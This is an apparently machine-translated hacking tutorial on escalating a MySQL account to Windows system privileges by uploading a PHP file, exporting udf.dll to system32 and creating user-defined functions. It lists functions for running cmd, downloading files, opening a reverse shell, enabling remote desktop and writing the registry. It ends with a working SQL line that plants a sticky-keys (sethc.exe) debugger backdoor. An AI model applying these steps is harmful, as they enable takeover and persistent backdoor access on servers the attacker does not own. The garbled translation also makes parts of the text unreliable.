Application of udf. dll in php Privilege Escalation

I. Functions: Use the custom functions of MYSQL (I declare again that using MYSQL UDF to escalate permissions is not an overflow, but a function of MYSQL itself ), converts a MYSQL account to a system permission. II. Application scenarios: 1. the target system is Windows (Win2000, XP, Win2003); 2. you already have a user account of MYSQL. This account must have the insert and delete permissions on mysql to create and discard functions (MYSQL document primitives ).

Iii. Help:
Step 1: Upload the PHP file to the target machine and enter your MYSQL account to connect.

Step 2: After the connection is successful, export the DLL file. Do not pay attention to the export path during export (generally any directory can be written without permission concerns). For MySQL or later versions, you must export the DLL to the system directory (win or system32) of the target machine. Otherwise, you will see the "No paths allowed for shared library" error in the next step.

Step 3: use SQL statements to create functions. Syntax: Create Function Name (the Function name can only be one of the following lists) returns string soname DLL path exported. For MySQL or later versions, the DLL in the statement cannot contain full paths, if you have exported the DLL to the system directory in step 2, you can omit the path and run the command normally. Otherwise, you will see the "Cant open shared library" error, in this case, you must re-export the DLL to the system directory.

Step 4: After correctly creating function functions, you can use these functions using SQL statements. Syntax: the name of the function (parameter list) created by the select statement. Each function has different parameters. You can use the help function created by the select statement to obtain the parameter list of the specified function.

Iv. Function Description:
Cmdshell executes cmd;
Downloader downloads the specified file online and saves it to the specified directory;
Open3389 General Open 3389 terminal service, you can specify the port (no need to restart without changing the port );
Backshell rebound Shell;
ProcessView: Lists system processes;
KillProcess: terminates a specified process;
Regread read the registry;
Regwrite write the registry;
Shut down shut, log off, and restart;
About description and help functions;

Write the registry function.
Select regwrite ("HKEY_LOCAL_MACHINE", "SOFTWARE \ Microsoft \ Windows

NT \ CurrentVersion \ Image File Execution Options \ sethc.exe "," Debugger "," REG_SZ "," E: \ web \ 170stock \ admin \ include \ assumer.exe ");